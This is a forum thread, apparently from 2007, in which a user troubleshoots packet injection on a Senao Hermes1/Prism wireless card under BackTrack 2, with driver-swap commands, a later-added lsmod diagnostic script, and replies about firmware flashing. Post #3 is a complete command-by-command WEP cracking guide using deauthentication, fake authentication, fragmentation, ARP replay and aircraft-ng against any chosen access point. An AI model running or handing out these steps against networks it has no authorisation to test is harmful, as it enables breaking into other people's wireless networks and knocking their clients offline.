
Thread: NL-2511CD EXT2 injection help

  1. #1
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default NL-2511CD EXT2 injection help

    Hi, I just joined the site today, but I have been reading around since yesterday. That may not seem like a lot, but I have been reading for 12 hours at a time. Um, here's my information:

    IBM Thinkpad T30
    -512 Ram
    -Pentium 4-M 1.8GHz
    -40GB HDD
    -Senao NL-2511CD PLUS EXT2 200mw PCMCIA WiFi 802.11b
    -My Interface is: eth1
    -My Chipset is: Hermes1
    -My Driver is: Orinoco


    I did the following:

    1: Put the card in and load up backtrack 2 final. Once it starts, the
    drivers for the card should be loaded. Open a bash prompt and type:

    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/orinoco*


    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/hermes.ko
    nano /etc/modprobe.d/blacklist

    2: Once you open the blacklist file, comment out the following lines in
    /etc/modprobe.d/blacklist:

    *NOTE: to comment something out, just add a # before it*


    #blacklist hostap_cs
    #blacklist hostap_pci
    #blacklist hostap_plx
    #blacklist hostap

    (Press CTRL-O to save changes)

    3: Now, insert the card again. With some laptops you might need to type:

    pccardctl insert

    in the bash prompt before it will notice the card again. Now type:

    bt ~ # lsmod

    4: lsmod "lists modules" that are currently loaded by your card.

    Module Size Used by
    hostap_cs 56500 1
    hostap 107540 1 hostap_cs

    5: Make sure that you see hostap_cs 56500 1 and hostap 107540 1 hostap_cs loaded.
    If all goes well, you can now use the packet injection methods with
    your wifi card.

    lsmod

    6: lsmod is used to list the modules (drivers) that are loaded for your
    card, and if it's using hostap or wlan-ng do load the drivers. Make sure
    it's using hostap. Now when you type lsmod you should see the following:

    Module Size Used by
    orinoco_cs 13576 1
    orinoco 37280 1 orinoco_cs
    hermes 6272 2 orinoco_cs,orinoco

    After I did this, I was able to use monitor mode (I could before, because Kismet would set my card into it), but then I tried to use the "WEP crack with no client" attack. When it came time to deauth, it gave me an error saying unsuccessful and that packet injection does not work AT ALL on Hermes1 and other cards, yet I see people typing that it works for them... So all I would like to know is:

    1: Is my card capable of performing a WEP crack on A, B, and G networks?
    2: Is my card capable of performing packet injection?
    3: Also, when I typed lsmod, instead of seeing:

    Module Size Used by
    hostap_cs 56500 1
    hostap 107540 1 hostap_cs

    I saw:

    Module Size Used by
    hostap_cs 56500 0
    hostap 107540 1 hostap_cs

    Please, if anyone can help me I would be so grateful. I am completely stuck. Thank you.



    -ShaTt3r3d Mind
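An added diagnostic, not from the thread or from BackTrack itself: pipe lsmod output through these two shell functions to see which wireless driver stack is bound (the stock Hermes/Orinoco modules, the hostap modules, or both at once, which the driver swap above is meant to avoid) and whether hostap lists its PCMCIA glue module as a user. The two sample listings are the ones quoted in the post above.

```shell
#!/bin/sh
# Added example (not the thread's or BackTrack's own code).

# lsmod listings quoted from the first post: after the swap (hostap) and before it (orinoco).
LSMOD_HOSTAP='Module Size Used by
hostap_cs 56500 1
hostap 107540 1 hostap_cs'

LSMOD_ORINOCO='Module Size Used by
orinoco_cs 13576 1
orinoco 37280 1 orinoco_cs
hermes 6272 2 orinoco_cs,orinoco'

# Read lsmod output on stdin and print one word:
#   hostap  - only the hostap family is loaded (what the thread's procedure aims for)
#   orinoco - only the stock orinoco/hermes family is loaded (swap not done)
#   mixed   - both families are loaded at once (rmmod the orinoco set first)
#   none    - neither family is present
classify_wifi_stack() {
    hostap=0
    orinoco=0
    while read -r module size usedby rest; do
        case "$module" in
            Module) continue ;;                          # header line
            hostap_cs|hostap_pci|hostap_plx|hostap) hostap=1 ;;
            orinoco_cs|orinoco_pci|orinoco|hermes)  orinoco=1 ;;
        esac
    done
    if [ "$hostap" = 1 ] && [ "$orinoco" = 1 ]; then echo mixed
    elif [ "$hostap" = 1 ]; then echo hostap
    elif [ "$orinoco" = 1 ]; then echo orinoco
    else echo none
    fi
}

# Exit 0 if the 'hostap' line's "Used by" column names hostap_cs, i.e. the
# PCMCIA glue that binds the card is stacked on the core module as expected.
hostap_has_cs_user() {
    awk '$1 == "hostap" && $4 ~ /(^|,)hostap_cs(,|$)/ { found = 1 } END { exit !found }'
}

# Stand-alone usage against the live system:
#   lsmod | classify_wifi_stack
#   lsmod | hostap_has_cs_user && echo "hostap_cs stacked on hostap"
```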

  2. #2
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Can anyone help me? I just can't figure out why this is not working. I mean, if it's because of my Hermes1 chipset then someone please tell me, because I will try to get another card, but I just don't understand. If this is the case, then why are other people posting that they have been able to use their Hermes1-based cards WITH packet injection? I just want to know if this is true or not, because I just built two computers and linked them up with a new Linksys router JUST to see if I can finally learn how to break WEP encryption. Please just tell me if this is true or not, and if it is true, can I and how do I enable packet injection? Just point me in the right direction and I will read more and more until I get it. Please. Thank you.

    P.S.
    Just to show you what I have done up to this point, here is a FULL list of my current actions.
    (Most of this is from different posts that I have read here and on other forums. Plus the "no wireless client attack" is from a video from offensive-security.com. I just listened to everything he said, took information from him and other posts and tried to make it clear for me to understand.) Here it is.

  3. #3
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    ******************************************************************************************
    *INTRODUCTION
    ******************************************************************************************
    Here I present to you what I like to call a 2-Piece Combo (or 2-PC).

    Combo One:
    Mixing passive scanning, Deauth/Replay Attack and aircrack to crack the WEP in under
    15 minutes with a client associated with the AP.

    Combo Two:
    The same as Combo One, except there is no client associated with the AP. You would use two
    NEW attacks called FAKEAUTH and FRAGMENT. FAKEAUTH, with other corrections, allows you to
    generate traffic on the network. Then use the new FRAGMENT attack which creates a
    "semi key trail" from the AP to your MAC which, with the FAKEAUTH attack, allows you to
    hijack the AP and create traffic, even if no one is connected to it. Then using
    Deauth/Replay you can greatly increase the traffic load and crack the key within minutes.
    ******************************************************************************************
    *INTRODUCTION
    ******************************************************************************************

    ******************************************************************************************
    *NOTES
    ******************************************************************************************
    1: This was all done using Backtrack 2 Final.
    Download from remote-exploit.

    2: This will show you the advanced way to crack WEP

    3: Some PRISM2/2.5 chipsets will work with
    this method (Hermes1 doesn't).

    4: Using this method(s) (see below) will allow you to
    the AP with or without a client, and under 15-mins

    5: Just to make this clear, this is the "ADVANCED WEP crack method".
    Special attacks/methods will be used, like: Replay/Deauth/Arp injections. :-)
    ******************************************************************************************
    *NOTES
    ******************************************************************************************

    ******************************************************************************************
    COMBO ONE: The Beginning
    ******************************************************************************************
    1: Open a bash prompt, and type:

    airodump-ng --band abg <wifi>

    -This will start a passive scan of APs around your area.

    2: Once you see the AP that you want to crack, make sure it has the following
    and write it down:
    -BSSID of the AP
    -The BSSID of a client. If there is none then don't worry about it.
    -The channel number
    -Make sure it has WEP encryption

    3: Type:

    CTRL-C

    to stop airodump-ng.

    Then type:
    airodump-ng -w <Name of save file> -c <channel#> --band abg <wifi>

    This will start a passive scan of the APs like before, but now it's only scanning on the
    channel the AP is on, and will hopefully speed things up by not collecting useless packets
    of other APs and channels. (Sure, you can filter that out later, BUT this cuts a bit of
    time off the capturing process. Watch the "PACKET/DATA" count. : )

    4: (Deauth Attack) Now open a new bash prompt and type:

    aireplay-ng -e <SSID> -a <BSSID> -c <Client Mac Address> --deauth 10 <wifi>

    -Don't activate this yet. This will cause a disconnection from the network (for the client),
    and upon reconnection it will send packets containing parts of the WEP key back to the
    router. This is what we want to intercept. So first go to step 5 before activating step 4.

    5: (Replay Attack) Open another bash prompt and type:

    aireplay-ng --arpreplay -b <BSSID> -h <Client Mac Address> <wifi>

    -Activate this. This attack will listen and sniff for the packet from the attack above. Now
    start the Deauth Attack. Once you start it you should see a deauth/discon of the machine,
    then it should capture the ARP packet (Used to reconnect to the AP) it will prompt you with
    "Use This Packet?" Type Y and now aireplay-ng will begin to replay that packet over and over
    to the BSSID. You can now close the Deauth Attack, but leave the Replay Attack open so you
    can keep growing your IV packet count. Leave it alone until you hit the 200,000 mark, then
    go into step 6

    6: Now open one last bash prompt, and type:

    aircrack-ng -f 4 -m <BSSID> -n <WEP Key Strength> <Name of save file>

    NOTE: The file type should be .CAP but if not just type ls to see the file.

    -Give it a few, and hopefully in a bit you should see the text "KEY FOUND!" in bold red
    letters. Good luck, and keep hacking!
    ******************************************************************************************
    COMBO ONE: THE END!
    ******************************************************************************************

    ******************************************************************************************
    COMBO TWO: THE BEGINNING!
    ******************************************************************************************
    1: Open a bash prompt, and type:

    airodump-ng --band abg <wifi>

    -This will start a passive scan of APs around your area.

    2: Once you see the AP that you want to crack, make sure it has the following
    and write it down:
    -BSSID of the AP
    -The BSSID of a client. If there is none then don't worry about it.
    -The channel number
    -Make sure it has WEP encryption

    Now stop airodump-ng by typing:

    CTRL-C


    3: Now clear the screen and type:

    airmon-ng start <wifi> <channel#>

    4: Open a new bash prompt and type:

    export AP=<AP Mac Address>

    Then Type:
    export WIFI=<Your Mac Address>

    -This cuts down on the typing and sets the MAC addresses to $AP/$WIFI (read on).

    Then Type:
    ifconfig <WIFI> up

    Then Type:
    iwconfig <WIFI> mode Monitor channel <channel#>

    5: (DEAUTH ATTACK)
    Clear this window and type:

    aireplay-ng -1 0 -e <SSID> -a $AP -h $WIFI <wifi>

    -You should see the following:

    Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)


    6: Open another bash window and type:

    aireplay-ng -5 -b $AP -h $WIFI <wifi>

    -aireplay-ng should scan for the ARP and ask you to use this packet; type y.
    Look below and COPY the fragment code in "SAVING KEYSTREAM". Also make sure that
    the BSSID and Source MAC are the SAME and match the AP (BSSID) you're hacking.
    Example:

    BSSID = 00:04:E2F:E5:8A
    Dest. MAC = 01:00:5E:7F:FF:FA
    Source MAC = 00:04:E2F:E5:8A

    7: (FRAGMENT ATTACK) Clear this screen and type:

    packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y <THE FRAGMENT CODE>.xor -w arp-request

    -The arp-request file is very important.

    8: Now open a new bash prompt and type:

    airodump-ng -c <channel#> --bssid $AP --ivs -w cap <wifi>

    -airodump-ng should now begin to capture packets and save them to the cap.ivs file.

    9: (FAKEAUTH ATTACK) Open up a new bash prompt and type:

    aireplay-ng -2 -r arp-request <wifi>

    -Make sure the BSSID matches the AP you are trying to hack. Make sure the "SM" matches your MAC
    address. The DM is 255.255.255.255/FF:FF:FF:FF:FF:FF, and make sure the BSSID matches the AP BSSID.
    Example:

    BSSID = 00:04:E2F:E5:8A
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 06:14:A4:27:FB:12

    -If all goes well, it should ask you "do you want to use this packet?" Type Y.
    It will begin to send the packet from your laptop to the AP, and airodump-ng should be collecting/saving the
    information.

    10: Open another bash prompt, and type:

    aircrack-ng -n <KEY STRENGTH> -b $AP *.ivs

    It should open the cap-01.ivs from airodump-ng, and should begin to crack it.
    ******************************************************************************************
    COMBO TWO: THE END!
    ******************************************************************************************

  4. #4
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    Where did you find this?

  5. #5
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Wow, still no help? Ok, um, after a few hours I found more information. A few people suggested upgrading the firmware, and then there was some information about patching drivers. Ok, so I took that information and revised it into something I could understand.


    1: boot into BT2F

    2: Take out the wireless card

    3: Type the following in the bash prompt:
    rmmod orinoco_cs
    rmmod orinoco
    rmmod hermes
    modprobe hostap_cs
    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/orinoco*
    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/hermes.ko

    4: Now type this into the bash prompt:
    nano /etc/modprobe.d/blacklist

    Locate the Following:
    blacklist hostap_cs
    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap

    Now make it look like this:
    # blacklist hostap_cs
    # blacklist hostap_pci
    # blacklist hostap_plx
    # blacklist hostap

    Now press CTRL-X to exit; it will ask you if you want to write to disk, type Y.
    Then press enter to close.

    5: Now type this in the bash window:

    nano /etc/pcmcia/config

    Go down to the #Wireless network adapters and look for:

    card "Intersil PRISM2 11 Mbps Wireless Adapter"
    manfid 0x0156, 0x0002
    bind "orinoco_cs"

    Now change it to:

    card "Intersil PRISM2 11 Mbps Wireless Adapter"
    manfid 0x0156, 0x0002
    bind "hostap_cs"

    Now press CTRL-X to exit; it will ask you if you want to write to disk, type Y.
    Then press enter to close.

    6: Now reinsert the wireless card and type:

    iwconfig

    Now look and see what your card's interface name is. It should be wlan0 (although for me I also had
    wifi0); if you still have eth1 then you did something wrong.

    7: Now type the following:

    airmon-ng start wlan0 <channel#>
    ifconfig wlan0 up

    8: Now Continue with the attacks.



    Ok, so after I did this my eth1 turned into a wlan0, BUT my problem now is when I try to use airodump:

    airodump-ng wlan0

    just to scan for networks, nothing comes out now, and before when I typed:

    airodump-ng --band abg wlan0

    a few APs appeared, but VERY slowly. Also, even after I typed:

    airmon-ng wlan0 mode monitor 6

    then:

    ifconfig wlan0 up

    my wireless card still just blinks even if I'm trying to do a passive scan with airodump, but before it went solid. Can someone please help me? This is driving me crazy. How can I fix my card so that it will scan faster like before? Also, when I tried to deauth my router it just hung after I typed the command. I had to press CTRL-C to stop it.

  6. #6
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    What firmware do you have?

  7. #7
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    My firmware: Intersil 1.4.9

    It looks like this:

    eth1: Firmware determined as Intersil 1.4.9

  8. #8
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    I don't think you'll need to patch anything. That's also the same firmware my card had before I flashed it with http://www.4shared.com/file/13786203...senao_174.html
    You can also use Linux to flash, which can be found in this forum too. Everyone tells me don't flash with Windows, do it through Linux.
    So flash at your own risk.

    After you have your firmware sorted, boot BT with your card in, eject it.
    nano /etc/modprobe.d/blacklist
    # blacklist hostap_cs
    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap
    blacklist orinoco_pci
    blacklist orinoco_cs
    blacklist orinoco
    blacklist hermes
    Ctrl+X / Y / enter
    You might need to reboot; it's only happened to me once.
    It should be all sorted now.
    Post back if you come across any problems.

  9. #9
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Hmm, ok, so I don't need to flash? Well, I like that idea because I don't want to mess up my card. Um, ok, so you're saying open the blacklist file with nano and only comment out

    # blacklist hostap_cs

    ? Or do I comment out

    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap
    blacklist orinoco_pci
    blacklist orinoco_cs
    blacklist orinoco
    blacklist hermes

    also?

    Oh, I am not sure if I said this before, but I am using a live CD.

    Thank you SOOOOO much : )

  10. #10
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    Forget the blacklist if you're using a live CD.
    rmmod orinoco_cs
    rmmod orinoco
    rmmod hermes
    modprobe hostap_cs

    I know you do this, but if you get any errors then add
    rmmod orinoco_pci
    I had to do that.
    Firmware 1.7.4 is the best for injection. That link is for that version.
    If you do use it, add both hex files to the program before you flash, or do it through Linux.
